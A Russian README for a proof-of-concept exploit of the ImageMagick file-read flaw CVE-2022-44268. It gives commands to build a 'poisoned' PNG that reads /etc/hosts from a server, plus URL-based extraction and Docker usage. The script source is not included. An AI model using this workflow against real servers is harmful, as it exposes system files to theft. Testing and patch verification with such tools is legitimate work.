
Эксплойт proof-of-concept для CVE-2022-44268, позволяющий произвольное чтение файлов через отравленные PNG-изображения, загружаемые в уязвимые экземпляры ImageMagick. Включает поддержку Docker и извлечение на основе URL.
CVE-2022-44268 ImageMagick произвольное чтение файлов — эксплойт Proof of Concept
Отравляем изображение ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Загрузите отравленное PNG-изображение.
Проверяем, успешен ли эксплойт 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
Сборка
docker build -t cve-2022-44268 .
Запуск
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| Параметр | Описание | Тип |
|---|---|---|
| --url | URL загруженного PNG-изображения | String |
| --image | Входной PNG-файл | File |
| --output | Выходной PNG-файл | File |
| --file-to-read | Файл для чтения с уязвимого хоста | String |